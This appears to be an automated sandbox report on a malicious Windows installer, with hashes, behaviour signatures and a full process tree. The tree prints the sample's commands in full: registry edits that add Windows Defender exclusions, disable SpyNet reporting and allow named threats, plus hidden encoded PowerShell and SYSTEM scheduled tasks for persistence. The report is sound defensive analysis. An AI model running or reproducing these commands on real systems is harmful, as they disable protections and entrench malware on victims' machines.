Analysis
-
max time kernel
120s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26-09-2022 03:03
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
20704fc92ed49100e2963e7690e4cc95
-
SHA1
d9d9c124c95fbc4749ef8ab8b2eb8c7acd329cdf
-
SHA256
a07f93b63123cdf3cbcb146daf61069b7137e1a297346fb2f4c5fdcd30d4acaf
-
SHA512
a0b2e238542707df3aaa6e379eb75ed318fd0fa5c8aca67e89325973c9e991b5da44d098cfca71cf0f27262dffcdd28eb0c0c90d34be58d91e761a959358f230
-
SSDEEP
196608:91OC2MisUkla+i6k9OP8EeQDPesNZZY9X:3Or1Hkla+MOEJsnCB
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSD91F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDDB3.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQXaASGyz" /SC once /ST 00:55:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQXaASGyz"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQXaASGyz"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNpHvRwEXzIclVjPnA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe\" hV /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exeC:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe hV /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxPFTwkiS" /SC once /ST 02:54:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxPFTwkiS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxPFTwkiS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZfXrITCAwqWWdJVle" /SC once /ST 04:36:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe\" Rv /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZfXrITCAwqWWdJVle"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exeC:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe Rv /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNpHvRwEXzIclVjPnA"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jFRyDUODU\PHErXK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bcMXixuPVnLBvIi" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcMXixuPVnLBvIi2" /F /xml "C:\Program Files (x86)\jFRyDUODU\YOItBGr.xml" /RU "SYSTEM"2⤵
